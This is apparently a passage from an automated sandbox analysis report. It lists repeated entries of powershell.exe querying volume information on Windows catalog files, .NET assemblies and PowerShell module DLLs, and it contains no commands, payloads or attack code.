      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
